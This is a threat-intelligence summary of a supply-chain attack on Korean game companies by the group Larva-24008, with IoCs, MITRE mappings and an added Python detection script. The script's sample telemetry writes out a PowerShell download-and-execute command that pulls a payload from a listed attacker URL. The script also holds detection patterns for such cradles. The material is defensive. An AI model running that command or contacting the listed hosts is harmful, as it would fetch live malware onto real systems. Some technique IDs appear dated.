Keypoints
- Threat actor identified as Larva-24008 conducted supply chain compromises against Korean game companies by modifying a game security module.
- The malicious module was code-signed with a valid certificate from a Korean game/security company, enabling distribution via official game launchers and installers.
- Inserted code executed PowerShell to download and run obfuscated scripts, using conditional checks to target specific IPs before deploying payloads.
- Primary payloads observed include Remcos RAT and stripped-down ZxShell backdoors, with ZxShell variants installed as services by a dropper.
- Attackers also used signed binaries (including game launchers) to harvest system identifiers and hardware/Windows version info sent to C2 servers.
- Stolen certificates have been reused since at least 2017 to sign various tooling (e.g., Mimikatz, PrintSpoofer) and multiple attackers may be leveraging them.
- Supply chain distribution and valid certificate usage allowed the malware to bypass defenses and reach targeted corporate systems via official update/install mechanisms.
MITRE Techniques
- [T1195] Supply Chain Compromise – The game security module was tampered with to distribute malware through legitimate game installations (‘Attackers compromised a game security module to distribute malware through legitimate game installations.’)
- [T1219] Remote Access Tools – Deployed Remcos RAT and ZxShell variants to enable remote control of infected systems (‘The malware installed Remcos RAT to allow remote control of infected systems.’)
- [T1086] PowerShell – Executed PowerShell commands to download and run obfuscated scripts from remote addresses (‘The malware executed PowerShell commands to download and run obfuscated scripts from specific addresses.’)
- [T1078] Valid Accounts (Code Signing Abuse) – Used valid code-signing certificates from a Korean game/security company to sign malicious modules and launchers, enabling trusted distribution (‘Attackers used valid certificates from a Korean game security company to sign malware, allowing it to bypass security measures.’)
Indicators of Compromise
- [MD5] dropper/backdoor hashes – 00eb89ba2b658f90f8749cf7b955b97b, 088d9d15874c1b3d31b1fd620667c38c and 3 more hashes
- [URL] download hosts for obfuscated binaries – http[:]//cloud[.]xt[.]to/uploads/09/30/xs[.]bin, http[:]//minecraft[.]cdn[.]fbi[.]to/launcher/cache/new/ipchecker[.]bin
- [FQDN] command-and-control / CDN domains – awvsf7esh[.]dellrescue[.]com, cdn[.]anydeskdns[.]com
- [IP] C2 / hosting IPs – 104[.]199[.]173[.]2, 185[.]158[.]113[.]101
The technical procedure began with the attacker modifying a legitimate game security module distributed by game companies. The tampered module was signed using a stolen valid certificate, which allowed it to be packaged into official game installers and launchers without tripping code-signing controls. When executed, the injected code runs PowerShell commands that retrieve and decrypt obfuscated script payloads from attacker-controlled URLs; those scripts perform environment checks (including matching specific IP addresses) and, if conditions are met, download and install remote access tools such as Remcos RAT or drop and register stripped-down ZxShell variants as services for persistent remote shell and file management access.
Post-infection activity observed includes service installation by a dropper, execution of remote shell and file-management commands, port forwarding, and use of signed auxiliary tools for privilege escalation and credential harvesting (examples referenced include Mimikatz and PrintSpoofer). Additionally, adversaries signed and distributed seemingly legitimate game launchers that collected system identifiers (username, computer name, MAC, IP) and detailed hardware/Windows version data, which were exfiltrated to C2 servers during launcher execution or updates. The reuse of the stolen certificates, traced in some cases back to 2017, suggests these signing credentials enable broad abuse across multiple campaigns and actors.
Defensive focus should include verifying build integrity and provenance (implementing SBOMs and stricter code-signing controls), monitoring PowerShell execution and suspicious downloads from the listed URLs/domains, validating installed services against known-good manifests, and blocking or investigating the provided hashes, domains, and IPs within telemetry to detect lateral movement and C2 callbacks.
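The infection chain described above (a PowerShell download-and-execute stage followed by a dropper registering services) and the defensive guidance in the previous paragraph both come down to the same triage tasks: match telemetry against the published indicators, flag PowerShell download cradles, and compare installed services against a known-good manifest. The following is an added Python example, not code from the AhnLab report or from any of the affected vendors. It uses only the indicators listed on this page (refanged at runtime); the log line formats, the service manifest, the observed service list and the function names are constructed for illustration.

```python
"""Indicator and behaviour triage for the Larva-24008 supply chain case.

Added example (not code from the AhnLab report or the affected vendors).
It refangs the IoCs listed on this page, scans constructed log lines for
PowerShell download cradles and IoC hits, and compares observed services
against a constructed known-good manifest.
"""
import re
from dataclasses import dataclass

# Indicators exactly as listed on this page (defanged with [.] and [:]).
DEFANGED_IOCS = {
    "md5": ["00eb89ba2b658f90f8749cf7b955b97b", "088d9d15874c1b3d31b1fd620667c38c"],
    "url": ["http[:]//cloud[.]xt[.]to/uploads/09/30/xs[.]bin",
            "http[:]//minecraft[.]cdn[.]fbi[.]to/launcher/cache/new/ipchecker[.]bin"],
    "fqdn": ["awvsf7esh[.]dellrescue[.]com", "cdn[.]anydeskdns[.]com"],
    "ip": ["104[.]199[.]173[.]2", "185[.]158[.]113[.]101"],
}


def refang(indicator: str) -> str:
    """Convert a defanged indicator back into the form that appears in logs."""
    return indicator.replace("[.]", ".").replace("[:]", ":").lower()


def _bounded(kind: str, value: str) -> re.Pattern:
    # IPs and host names get boundaries so 104.199.173.2 does not hit 104.199.173.20;
    # a leading subdomain is still allowed for FQDNs; URLs are matched as substrings.
    if kind == "ip":
        return re.compile(r"(?<![\d.])" + re.escape(value) + r"(?![\d.])")
    if kind == "fqdn":
        return re.compile(r"(?<![\w-])" + re.escape(value) + r"(?![\w-])")
    return re.compile(re.escape(value))


IOCS = {k: [refang(v) for v in vals] for k, vals in DEFANGED_IOCS.items()}
IOC_PATTERNS = {k: [(v, _bounded(k, v)) for v in IOCS[k]] for k in ("url", "fqdn", "ip")}

# A download primitive together with an execution primitive, or an encoded
# command, is the shape of the PowerShell stage described in the report.
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression|Start-Process", re.I)
ENCODED_RE = re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)


@dataclass(frozen=True)
class Finding:
    source: str    # "log:<n>" or "service:<name>"
    reason: str    # which rule fired
    evidence: str  # matching indicator, command fragment or binary path


def is_download_cradle(cmdline: str) -> bool:
    """True for download-and-execute chains or encoded PowerShell commands."""
    download_and_exec = bool(DOWNLOAD_RE.search(cmdline)) and bool(EXEC_RE.search(cmdline))
    return download_and_exec or bool(ENCODED_RE.search(cmdline))


def match_iocs(line: str) -> list[tuple[str, str]]:
    """Return (kind, indicator) pairs from the page's IoC list found in one line."""
    lower = line.lower()
    hits = [(k, v) for k in ("url", "fqdn", "ip") for v, pat in IOC_PATTERNS[k] if pat.search(lower)]
    hits += [("md5", h.lower()) for h in MD5_RE.findall(line) if h.lower() in IOCS["md5"]]
    return hits


def check_services(observed: dict[str, str], manifest: dict[str, str]) -> list[Finding]:
    """Flag services absent from the known-good manifest or whose binary path differs."""
    findings = []
    for name, path in observed.items():
        expected = manifest.get(name)
        if expected is None:
            findings.append(Finding(f"service:{name}", "service not in manifest", path))
        elif expected.lower() != path.lower():
            findings.append(Finding(f"service:{name}", "service binary path changed", path))
    return findings


def triage(log_lines: list[str], observed: dict[str, str], manifest: dict[str, str]) -> list[Finding]:
    """Run all three checks and return every finding."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        if is_download_cradle(line):
            findings.append(Finding(f"log:{n}", "powershell download cradle", line[:60]))
        for kind, ioc in match_iocs(line):
            findings.append(Finding(f"log:{n}", f"ioc {kind}", ioc))
    return findings + check_services(observed, manifest)


# Constructed sample telemetry (process creation, DNS, network, file events).
SAMPLE_LOGS = [
    "4688 NewProcess=powershell.exe CommandLine=powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://cloud.xt.to/uploads/09/30/xs.bin')",
    r"4688 NewProcess=C:\Games\Launcher\launcher.exe CommandLine=launcher.exe --update",
    "DNS client query name=cdn.anydeskdns.com src=10.0.5.17",
    r"Sysmon 3 NetworkConnect image=C:\Windows\System32\svchost.exe dst=185.158.113.101:443",
    r"FileCreate target=C:\Windows\Temp\svc.dll md5=00EB89BA2B658F90F8749CF7B955B97B",
    "4688 NewProcess=powershell.exe CommandLine=powershell -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=",
]
# Constructed known-good manifest and observed service list (names are hypothetical).
KNOWN_GOOD_SERVICES = {"Spooler": r"C:\Windows\System32\spoolsv.exe",
                       "GameSecMod": r"C:\Games\Security\gsm.exe"}
OBSERVED_SERVICES = {"Spooler": r"C:\Windows\System32\spoolsv.exe",
                     "GameSecMod": r"C:\Windows\Temp\gsm.exe",
                     "UpdSvc": r"C:\ProgramData\upd\svc.exe"}

if __name__ == "__main__":
    for f in triage(SAMPLE_LOGS, OBSERVED_SERVICES, KNOWN_GOOD_SERVICES):
        print(f"{f.source:12} {f.reason:30} {f.evidence}")
```

The cradle rule deliberately requires a download primitive and an execution primitive together (or an encoded command) so that ordinary administrative downloads do not fire on their own; the IP and host-name patterns carry boundaries so that a prefix match on a different address or host is not reported. The report lists further hashes beyond the two reproduced here, so the `md5` list should be extended from the source before this is used in real triage.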
Read more: https://asec.ahnlab.com/en/83693/